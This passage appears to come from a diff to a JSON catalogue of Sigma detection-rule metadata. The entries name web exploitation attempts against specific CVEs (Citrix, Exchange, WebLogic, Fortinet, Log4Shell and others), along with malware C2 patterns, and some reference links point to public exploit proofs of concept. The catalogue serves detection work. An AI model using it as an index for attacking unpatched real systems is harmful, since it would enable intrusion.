] + }, + "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", + "value": "Suspicious User Agent" + }, + { + "description": "Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/08", + "falsepositive": [ + 
"Unknown" + ], + "filename": "proxy_ua_susp_base64.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp_base64.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", + "value": "Suspicious Base64 User Agent" + }, + { + "description": "Detects Ursnif C2 traffic.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ursnif_malware_c2_url.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_c2_url.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1204.002", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", + "value": "Ursnif Malware C2 URL Pattern" + }, + { + "description": "Detects download of Ursnif malware done by dropper documents.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ursnif_malware_download_url.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_download_url.yml" + ], + "tags": "No established tags" + }, + "uuid": "a36ce77e-30db-4ea0-8795-644d7af5dfb4", + "value": "Ursnif Malware Download URL Pattern" + }, + { + "description": "Detects a segmentation fault error message caused by a creashing apache worker process", + 
"meta": { + "author": "Florian Roth", + "creation_date": "2017/02/28", + "falsepositive": [ + "Unknown" + ], + "filename": "web_apache_segfault.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "http://www.securityfocus.com/infocus/1633", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_segfault.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ] + }, + "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", + "value": "Apache Segmentation Fault" + }, + { + "description": "Detects an issue in apache logs that reports threading related errors", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/22", + "falsepositive": [ + "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" + ], + "filename": "web_apache_threading_error.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_threading_error.yml" + ], + "tags": "No established tags" + }, + "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", + "value": "Apache Threading Error" + }, + { + "description": "MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\nwhen magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. 
(dot dot) in the class_key parameter.\n", + "meta": { + "author": "Subhash Popuri (@pbssubhash)", + "creation_date": "2021/08/25", + "falsepositive": [ + "Scanning from Nuclei", + "Unknown" + ], + "filename": "web_cve_2010_5278_exploitation_attempt.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/projectdiscovery/nuclei-templates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2010_5278_exploitation_attempt.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61", + "value": "CVE-2010-5278 Exploitation Attempt" + }, + { + "description": "Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/19", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2014_6287_hfs_rce.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/", + "https://www.exploit-db.com/exploits/39161", + "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.t1505.003", + "cve.2014.6287" + ] + }, + "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae", + "value": "Rejetto HTTP File Server RCE" + }, + { + "description": "Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/12/08", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2018_13379_fortinet_preauth_read_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + 
"logsource.product": "No established product", + "refs": [ + "https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "a2e97350-4285-43f2-a63f-d0daff291738", + "value": "Fortinet CVE-2018-13379 Exploitation" + }, + { + "description": "Detects access to a webshell dropped into a keystore folder on the WebLogic server", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/07/22", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2018_2894_weblogic_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/pyn3rd/status/1020620932967223296", + "https://github.com/LandGrey/CVE-2018-2894", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_2894_weblogic_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.t1505.003", + "cve.2018.2894" + ] + }, + "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", + "value": "Oracle WebLogic Exploit" + }, + { + "description": "Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/11/18", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2019_11510_pulsesecure_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.exploit-db.com/exploits/47297", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_11510_pulsesecure_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60", + "value": "Pulse Secure Attack CVE-2019-11510" + }, + { + "description": 
"Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack", + "meta": { + "author": "Arnim Rupp, Florian Roth", + "creation_date": "2020/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2019_19781_citrix_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://support.citrix.com/article/CTX267679", + "https://support.citrix.com/article/CTX267027", + "https://isc.sans.edu/diary/25686", + "https://twitter.com/mpgn_x64/status/1216787131210829826", + "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756", + "value": "Citrix Netscaler Attack CVE-2019-19781" + }, + { + "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2019_3398_confluence.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_3398_confluence.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b", + "value": "Confluence Exploitation CVE-2019-3398" + }, + { + "description": "Detects CVE-2020-0688 Exploitation attempts", + "meta": { + "author": "NVISO", + "creation_date": "2020/02/27", + "falsepositive": [ + "Unknown" + ], + "filename": 
"web_cve_2020_0688_exchange_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/Ridter/cve-2020-0688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_exchange_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a", + "value": "CVE-2020-0688 Exploitation Attempt" + }, + { + "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/02/29", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_0688_msexchange.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_msexchange.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5", + "value": "CVE-2020-0688 Exchange Exploitation via Web Log" + }, + { + "description": "Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts", + "meta": { + "author": "Bhabesh Raj, Tim Shelton", + "creation_date": "2020/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_10148_solarwinds_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://kb.cert.org/vuls/id/843464", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_10148_solarwinds_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af", + "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass" 
+ }, + { + "description": "Detects exploitation attempts on WebLogic servers", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/11/02", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_14882_weblogic_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://isc.sans.edu/diary/26734", + "https://twitter.com/jas502n/status/1321416053050667009?s=20", + "https://twitter.com/sudo_sudoka/status/1323951871078223874", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.14882" + ] + }, + "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b", + "value": "Oracle WebLogic Exploit CVE-2020-14882" + }, + { + "description": "Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/01/25", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_28188_terramaster_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/", + "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_28188_terramaster_rce_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.28188" + ] + }, + "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e", + "value": "TerraMaster TOS CVE-2020-28188" + }, + { + "description": "Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/07", + "falsepositive": [ + "Unknown" + ], + "filename": 
"web_cve_2020_3452_cisco_asa_ftd.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/aboul3la/status/1286012324722155525", + "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.3452" + ] + }, + "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29", + "value": "Cisco ASA FTD Exploit CVE-2020-3452" + }, + { + "description": "Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/05", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_5902_f5_bigip.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://support.f5.com/csp/article/K52145254", + "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", + "https://twitter.com/yorickkoster/status/1279709009151434754", + "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478", + "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt" + }, + { + "description": "Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/10", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_8193_8195_citrix_exploit.yml", + "level": 
"critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://support.citrix.com/article/CTX276688", + "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", + "https://dmaasland.github.io/posts/citrix.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7", + "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195" + }, + { + "description": "Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", + "https://www.tenable.com/security/research/tra-2021-13", + "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.20090", + "cve.2021.20091" + ] + }, + "uuid": "f0500377-bc70-425d-ac8c-e956cd906871", + "value": "Arcadyan Router Exploitations" + }, + { + "description": "Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/01/20", + "falsepositive": [ + "Unknown" + ], + "filename": 
"web_cve_2021_2109_weblogic_rce_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/pyn3rd/status/1351696768065409026", + "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2021.2109" + ] + }, + "uuid": "687f6504-7f44-4549-91fc-f07bab065821", + "value": "Oracle WebLogic Exploit CVE-2021-2109" + }, + { + "description": "Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/02/24", + "falsepositive": [ + "OVA uploads to your VSphere appliance" + ], + "filename": "web_cve_2021_21972_vsphere_unauth_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", + "https://f5.pm/go-59627.html", + "https://swarm.ptsecurity.com/unauth-rce-vmware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "179ed852-0f9b-4009-93a7-68475910fd86", + "value": "CVE-2021-21972 VSphere Exploitation" + }, + { + "description": "Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/03/10", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_21978_vmware_view_planner_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/wugeej/status/1369476795255320580", + "https://paper.seebug.org/1495/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.21978" + ] + }, + "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9", + "value": "CVE-2021-21978 Exploitation Attempt" + }, + { + "description": "Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/09/24", + "falsepositive": [ + "Vulnerability Scanning" + ], + "filename": "web_cve_2021_22005_vmware_file_upload.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://kb.vmware.com/s/article/85717", + "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec", + "value": "VMware vCenter Server File Upload CVE-2021-22005" + }, + { + "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs", + "meta": { + "author": "Bhabesh Raj, Florian Roth", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_22123_fortinet_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22123_fortinet_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4", + "value": "Fortinet CVE-2021-22123 Exploitation" + }, + { + "description": "This rule detects exploitation attempts using 
Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/29", + "falsepositive": [ + "Vulnerability Scanning" + ], + "filename": "web_cve_2021_22893_pulse_secure_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "5525edac-f599-4bfd-b926-3fa69860e766", + "value": "Pulse Connect Secure RCE Attack CVE-2021-22893" + }, + { + "description": "Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_26814_wzuh_rce.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26814_wzuh_rce.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.21978", + "cve.2021.26814" + ] + }, + "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3", + "value": "Exploitation of CVE-2021-26814 in Wazuh" + }, + { + "description": "When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories", + "meta": { + "author": "frack113", + "creation_date": "2021/08/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "web_cve_2021_26858_iis_rce.yml", + "level": "critical", + 
"logsource.category": "webserver", + "logsource.product": "windows", + "refs": [ + "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26858_iis_rce.yml" + ], + "tags": "No established tags" + }, + "uuid": "effee1f6-a932-4297-a81f-acb44064fa3a", + "value": "ProxyLogon Reset Virtual Directories Based On IIS Log" + }, + { + "description": "Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/14", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_28480_exchange_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/GossiTheDog/status/1392965209132871683?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_28480_exchange_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b", + "value": "Exchange Exploitation CVE-2021-28480" + }, + { + "description": "Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766", + "meta": { + "author": "Florian Roth, Max Altgelt, Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_33766_msexchange_proxytoken.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": 
"56973b50-3382-4b56-bdf5-f51a3183797a", + "value": "CVE-2021-33766 Exchange ProxyToken Exploitation" + }, + { + "description": "Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539", + "meta": { + "author": "Tobias Michalski, Max Altgelt", + "creation_date": "2021/09/20", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_40539_adselfservice.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_adselfservice.yml" + ], + "tags": "No established tags" + }, + "uuid": "6702b13c-e421-44cc-ab33-42cc25570f11", + "value": "ADSelfService Exploitation" + }, + { + "description": "Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).", + "meta": { + "author": "Sittikorn S, Nuttakorn Tungpoonsup", + "creation_date": "2021/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_40539_manageengine_adselfservice_exploit.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/", + "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", + "https://us-cert.cisa.gov/ncas/alerts/aa21-259a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1", + "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit" + }, + { + "description": "Detects exploitation of 
flaw in path normalization in Apache HTTP server 2.4.49.\nAn attacker could use a path traversal attack to map URLs to files outside the expected document root.\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\nAdditionally this flaw could leak the source of interpreted files like CGI scripts.\nThis issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n", + "meta": { + "author": "daffainfo, Florian Roth", + "creation_date": "2021/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_41773_apache_path_traversal.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://nvd.nist.gov/vuln/detail/CVE-2021-41773", + "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782", + "https://twitter.com/ptswarm/status/1445376079548624899", + "https://twitter.com/h4x0r_dz/status/1445401960371429381", + "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml", + "https://twitter.com/bl4sty/status/1445462677824761878", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5", + "value": "CVE-2021-41773 Exploitation Attempt" + }, + { + "description": "Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/17", + "falsepositive": [ + "Vulnerability Scanning" + ], + "filename": "web_cve_2021_42237_sitecore_report_ashx.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + 
"https://blog.assetnote.io/2021/11/02/sitecore-rce/", + "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_42237_sitecore_report_ashx.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f", + "value": "Sitecore Pre-Auth RCE CVE-2021-42237" + }, + { + "description": "Detects a successful Grafana path traversal exploitation", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/08", + "falsepositive": [ + "Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error" + ], + "filename": "web_cve_2021_43798_grafana.yml", + "level": "critical", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/", + "https://github.com/search?q=CVE-2021-43798", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16", + "value": "Grafana Path Traversal Exploitation CVE-2021-43798" + }, + { + "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/10", + "falsepositive": [ + "Vulnerability scanning" + ], + "filename": "web_cve_2021_44228_log4j.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://news.ycombinator.com/item?id=29504755", + "https://github.com/tangxiaofeng7/apache-log4j-poc", + "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b", + 
